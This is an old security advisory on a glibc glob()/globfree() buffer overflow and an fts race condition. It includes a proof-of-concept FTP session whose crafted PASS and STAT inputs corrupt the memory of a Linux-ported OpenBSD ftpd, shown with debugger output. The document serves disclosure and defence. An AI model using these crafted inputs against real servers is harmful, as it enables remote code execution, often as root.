COMMAND

	fts race condition and glob buffer overflow

SYSTEMS AFFECTED

	glibc-2.2

PROBLEM

	In Tom Parker [http://www.globalintersec.com] advisory [2001121001] :
	

	Two bugw were found in glibc, leading to a buffer overflow  and  a  race
	condition.
	

	The race condition is  in  the  fts  routines  that  traverse  directory
	structures which allowed malicious users to  cause  other  processes  to
	\'break out of\' the file heirarchy. The fts problem was  discovered  by
	Nick Cleaton.
	

	

	The buffer  overflow  is  about  glob()  and  globfree()  functions,  as
	described in Global InterSec Advisory 2001121001.
	

	The glibc glob() function allows  programs  to  search  for  path  names
	matching specific patterns according the rules used by the shell.  Glibc
	also implements the globfree()  function  which  free()\'s  memory  used
	earlier by other glob() matches.
	

	The glob function itself may  encounter  errors  when  handling  strings
	ending with the \"{\"(0x7b)character. This is  due  to  next_brace_sub()
	which  could  cause  glob  to  read  memory  pages  it  shouldn\'t   be,
	eventually causing the program to exit (Normally with SEGV)..
	

	Note:  The  vulnerability  described  in  CA-2001-33   with   Washington
	Universities ftpd was not due to errors in glibc glob -  but  their  own
	implementation of this function.
	

	Previous discussions on bugtraq and other mailing lists ruled  this  bug
	as not exploitable. This is not entirely true.
	

	Global Intersec has since discovered a condition  under  which  the  bug
	may be used to exploit this vulnerability.
	

	This is dependant on  the  program  in  question  using  the  globfree()
	function, also defined  in  glibc  glob.c  (sysdeps/generic/glob.c).  An
	example of this would be the OpenBSD ftpd Linux port.
	

	By carefully crafting user input to  such  daemons  it  is  possible  to
	corrupt memory space of the  process.  Ultimately  the  result  of  this
	would be an ability to execute arbitrary commands  with  the  privileges
	of the server process. This is often root(0).
	

	Scope for attack:
	

	For this bug to be exploitable the attacker must  be  able  to  cause  a
	daemon to call glob matching functions via services which  allow  either
	anonymous/public  access  or  which  may  require  authentication.  This
	includes ftp daemons.
	

	

	Exploits (Proof of concept):
	

	For the purposes of proving a concept we will now refer to use of  these
	functions in the OpenBSD ftp daemon - ported to Linux by David Madore.
	

	As we have recently  seen  in  the  Washington  University  ftp  daemon,
	free() based vulnerabilities are readily exploitable.  In  the  case  of
	the OpenBSD ftpd we must ensure that globfree() is called  to  make  any
	use of the glob vulnerabilities.
	

	Note: OpenBSD itself is not vulnerable to this form  of  attack  due  to
	the way in which it handles memory pages.
	

	By  forcing  globfree()  to  be  called  _before_   the   next_brace_sub
	condition occurs  it  is  possible  to  control  the  address  which  is
	free()\'d. In our first example we insert an invalid  address  onto  the
	stack, causing the program to SEGV.
	

	

	   : 220 localhost FTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.

	   -> USER ftp

	   : 331 Guest login ok, type your name as password.

	   Sleeping for 10 seconds...

	   -> PASS AAAAAAAAAAAAAAAAAAA\\xef\\xef\\xbe\\xad\\xde # ( <19 Bytes> <Addr to

	write> <Glob char>)

	   : 230 Guest login ok, access restrictions apply.

	   -> STAT ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{

	

	   #0  0x400f7968 in globfree () at ../sysdeps/generic/glob.c:1055

	   #1  0x8051b0b in yyparse () at ftpcmd.y:1138

	   # 2  0x804b455 in main (argc=3D1094795585, argv=3D0xbffff864,

	envp=3D0xbffff86c) at ftpd.c:715

	

	

	Examination of the registers shows that we  have  successfully  inserted
	the intended address. As the address is not valid  the  ftp  daemon  seg
	faults.
	

	

	   <snip>

	   esi            0xdeadbeef       -559038737

	   edi            0xdeadbeef       -559038737

	   </snip>

	

	

	On giving the ftp daemon a  valid  address  to  free  (In  this  case  a
	pointer to syslog()) the daemon will continue to free() the  address  we
	gave it # where it again will segfault due to the  address  we  gave  it
	not being a valid malloc chunk.
	

	

	   #0  0x400c6178 in free () at malloc.c:2952

	   #1  0x400f7989 in globfree () at ../sysdeps/generic/glob.c:1055

	   #2  0x8051b0b in yyparse () at ftpcmd.y:1138

	   #3  0x804b455 in main (argc=3D1094795585, argv=3D0xbffff864,

	envp=3D0xbffff86c) at ftpd.c:715

	

	   ie (SuSE glibc-2.2/sysdeps/generic/glob.c):

	   glob.c:1097  if (pglob->gl_pathv[pglob->gl_offs + i] != NULL)

	   glob.c:1098    free ((__ptr_t) pglob->gl_pathv[pglob->gl_offs + i]);

	   glob.c:1099  free ((__ptr_t) pglob->gl_pathv);

	

	

	Information on exploiting this form of vulnerability are available at
	http://www.phrack.org/show.php?p=57&a=9

	

	

	

SOLUTION

	Install new packages from your distribution.
	

	

	 Legal:

	

	   This advisory is the intellectual property of Global InterSec LLC 

	   but may be freely distributed with the conditions that:

	   a) no fee is charged and b) appropriate credit is given.

	   (c) Global InterSec LLC 2001